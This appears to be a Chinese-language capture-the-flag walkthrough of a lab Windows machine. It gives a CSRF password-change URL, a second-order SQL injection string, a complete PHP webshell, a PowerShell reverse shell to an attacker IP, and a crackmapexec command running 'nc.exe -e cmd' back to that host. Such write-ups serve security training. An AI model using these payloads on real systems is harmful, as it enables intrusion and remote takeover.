信息收集

8808端口

Windows IIS 10.0

可以从官方文档查看10.0版本可能的操作系统。

80端口

通过CSRF获取

目录扫描发现需要登陆后继续进一步操作啊。

对其进行简单的SQL注入测试。此外还发现如果没有此账号会出现No account found with that username.可以借机来判断拥有哪些用户。

此外还有一个注册业务。

由于GDPR,所有用户必须删除任何包含个人身份信息(PII)的注释。
如有任何问题，请使用下面的联系链接联系tyler@secnotes.htb。

从这段话里能收获一个用户tyler。
接着测试一下New Note功能。

哈，我干了啥？

暂不清楚还是小心为妙，去验证一下tyler是否存在，如果存在就会说明密码不可用。

OK，现在有两个问题。一是如果目标是用的是关系数据库比如Mysql等，可以考虑从登录的select语句、注册用户的insert语句、修改密码的update语句注入。二是如果目标是用的NoSQL，那么可以考虑利用正则表达获取密码。
此外我还发现如果操作过快，比如点击修改密码后快速返回上一个页面就会触发检测器。

根据前面目录扫描结果判断为NoSQL可能性较高，当然也可能是障眼法引诱我掉入兔子洞。

先试试在登录处NoSQL吧。

可能注册和登录会有一个二次注入不过等会再试，还剩下一个联系我们。

随便输入后提交。

在测试时发现如果发送文字内包含了一个链接，那么目标的某个脚本回访回访问连接。

连接被访问。

可以试试CSRF(Cross Site Request Forgery)跨站点请求伪造。简单来说就是让目标点击恶意网站并执行构造好的脚本。当前环境下目标不想做的恐怕就是修改密码了。所以来构造一个使目标修改密码的payload。

试试转化为GET能否发送。

答案显而易见。

payload如下：

http://10.10.10.97/change_pass.php?password=123456&confirm_password=123456&submit=submit

利用Contact Us发送XSRF payload。

利用成功，使用tyler:123456登录目标。

通过二次注入

注册用户’or 1=1#后登录。注册了一个用户 'or 1=1#，进入select语句 select notes from table where username = '‘or 1=1#’

有三个Note，分别是迷你的粘性面包的配方、年份、还有tyler / 92g!mA8BGjOirkL%OG*&。

使用获取的凭证登录smb服务。

有一个new-site目录我们拥有读写权，这就意味着有机会通过写入webshell或者reverse shell。

iisstart.htm不就是8808端口的么。

立足

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }
?>
</pre>
</body>
<script>document.getElementById("cmd").focus();</script>
</html>

使用payload连接。

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.31',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

收集信息。

tyler -> administrator

在tyler的desktop目录下有一个bash的快捷方式。

C盘根目录下还有一个Ubuntu的压缩包。

C根目录下的Distros

查找刚刚的bash.exe具体在哪里，运行没用。

搜索全部可能。

运行还是没有结果。

可能是因为shell问题。

使用nc后就正常了。

查看linux的历史，发现了管理员账号信息，似乎管理员在把windows上的共享目录挂载到linux上，经过测试发现他确实做到了。

administrator%u6!4ZwgwOM#^OBf#Nwnh有点乱，试试就知道密码是u6!4ZwgwOM#^OBf#Nwnh，可以通过smbclient直接拿到flag。

想通过evil-winrm拿到shell，可惜失败了。

那还有什么办法么，那当然有。可以通过crackmapexec来完成。

crackmapexec smb 10.10.10.97 -u 'administrator' -p 'u6!4ZwgwOM#^OBf#Nwnh' -X 'C:\inetpub\new-site\nc.exe -e cmd 10.10.14.31 4443'